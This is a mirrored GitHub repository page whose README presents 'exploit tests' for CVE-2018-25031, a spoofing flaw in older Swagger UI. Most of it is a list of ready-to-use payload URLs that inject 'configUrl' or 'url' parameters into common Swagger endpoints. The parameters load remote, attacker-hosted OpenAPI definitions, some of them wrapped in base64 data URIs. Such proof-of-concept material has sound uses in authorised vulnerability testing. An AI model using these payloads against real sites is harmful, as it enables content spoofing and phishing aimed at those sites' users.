https://github.com/mathis2001/cve-2018-25031

CVE-2018-25031 tests
https://github.com/mathis2001/cve-2018-25031

Last synced: 4 months ago
JSON representation

CVE-2018-25031 tests

• Host: GitHub
• URL: https://github.com/mathis2001/cve-2018-25031
• Owner: mathis2001
• Created: 2023-06-28T13:41:22.000Z (almost 3 years ago)
• Default Branch: main
• Last Pushed: 2024-12-04T13:45:30.000Z (over 1 year ago)
• Last Synced: 2025-10-05T12:38:43.636Z (9 months ago)
• Size: 46.9 KB
• Stars: 3
• Watchers: 1
• Forks: 8
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# CVE-2018-25031

CVE-2018-25031 exploits tests

Swagger UI before 4.1.3 could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions.

## HowTo

Find the documentation endpoint and add the parameter "configUrl" pointing to test.json or "url" pointing to test.yaml.

```

https://exemple.com/?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json

https://exemple.com/?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml

https://exemple.com/swagger-ui/index.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml

https://exemple.com/swagger-ui.html?url=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.yaml

https://exemple.com/api/swagger/index.html?configUrl=https://raw.githubusercontent.com/mathis2001/CVE-2018-25031/main/test.json

https://exemple.com/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0Lmpzb24iCn0=

https://exemple.com/?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=

https://exemple.com/swagger-ui/index.html?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=

https://exemple.com/swagger-ui.html?url=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0LnlhbWwiCn0=

https://exemple.com/api/swagger/index.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21hdGhpczIwMDEvQ1ZFLTIwMTgtMjUwMzEvbWFpbi90ZXN0Lmpzb24iCn0=

```

## Screenshots

![image](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b8267eec-332d-477f-a6e1-5087ab15f607)

![tempsnip](https://github.com/mathis2001/CVE-2018-25031/assets/40497633/b5104f39-c3cb-4d5d-8496-06c31337b3d7)